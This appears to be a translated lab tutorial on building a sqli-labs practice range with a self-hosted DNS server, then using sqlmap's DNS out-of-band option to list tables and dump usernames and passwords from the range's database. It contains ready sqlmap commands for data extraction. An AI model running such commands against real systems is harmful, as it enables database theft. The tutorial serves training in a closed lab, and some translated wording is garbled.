sqlmap combined with dnslog fast injection

How to use sqlmap combined with dnslog to inject quickly

First we need three virtual machines, one Windows10 as the client, Windows server2008 as the server, and one kali.

The first step: first download the phpstudy skin panel on Windows10, then download the sqli-labs shooting range, and put the sqli-labs shooting range file into the WWW directory

Step 2: Modify the database configuration file and add secure_file_priv="" to the my.ini of the database to facilitate reading the file later

Step 3: Set up a DNS server on Windows server 2008

Click Role-->Add Role-->Click Server Role-->Select DNS Server-->Next-->Install

Right click to view the properties of WIN-JGVPSZCQ80R-->Monitor-->Tick the two test types-->OK

New area: Right-click New-->Next-->Customize an area name-->Next-->Finish

Create a new host ns1.ceshi.top, so fill in the IP address of the kali virtual machine

Create another pan-parse:

Step 4: Configure the IP of the DNS server on Windows 10

Step 5: Use the domain name created in Windows10ping DNS and view it in kali

Step 6: Create a repeater in Windows server2008

Use the domain name of the Windows10 ping forwarder and view it in kali

Step 7: sqlmap uses DNSlog out-of-band injection

We use sqlmap to find the table name in the database

sqlmap -u "http://192.168.112.139/sqli/sql/Less-8?id=1" --technique=T --dns-domain "hello.top" -D security --tables

Find the columns in the table according to the users table name

sqlmap -u "http://192.168.112.139/sqli/sql/Less-8?id=1" --technique=T --dns-domain "hello.top" -D "security"-t "users" --columns

Retrieve data from users table

sqlmap -u "http://192.168.112.139/sqli/sql/Less-8?id=1" --technique=T --dns-domain "hello.top" -D "security"-t "users" -C "username,password" --dump